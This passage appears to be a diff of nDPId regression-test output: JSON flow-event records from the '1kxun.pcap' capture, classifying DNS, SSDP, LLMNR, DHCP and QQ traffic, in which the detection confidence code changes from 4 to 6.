{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377734,"flow_last_seen":1470104377753,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104398932,"flow_last_seen":1470104433649,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104378045,"flow_last_seen":1470104423102,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104378045,"flow_last_seen":1470104423102,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"239.255.255.250","src_port":59468,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104426992,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104376301,"flow_last_seen":1470104422690,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391362,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1470104380773,"flow_last_seen":1470104381859,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":445,"flow_tot_l4_payload_len":3534,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104382242,"flow_last_seen":1470104432114,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1596,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1470104382241,"flow_last_seen":1470104432114,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104373232,"flow_last_seen":1470104432419,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1729,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1470104419061,"flow_last_seen":1470104419317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1833,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1470104414296,"flow_last_seen":1470104414478,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3753,"flow_avg_l4_payload_len":417,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104392072,"flow_last_seen":1470104422079,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00606{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378657,"flow_last_seen":1470104408662,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":658,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"2001:b030:214:100:c2a0:bbff:fe73:eb47","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373741,"flow_last_seen":1470104416751,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":4200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408457,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":62069,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104413679,"flow_last_seen":1470104413679,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104373741,"flow_last_seen":1470104416751,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":4200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104406717,"flow_last_seen":1470104407128,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":53962,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 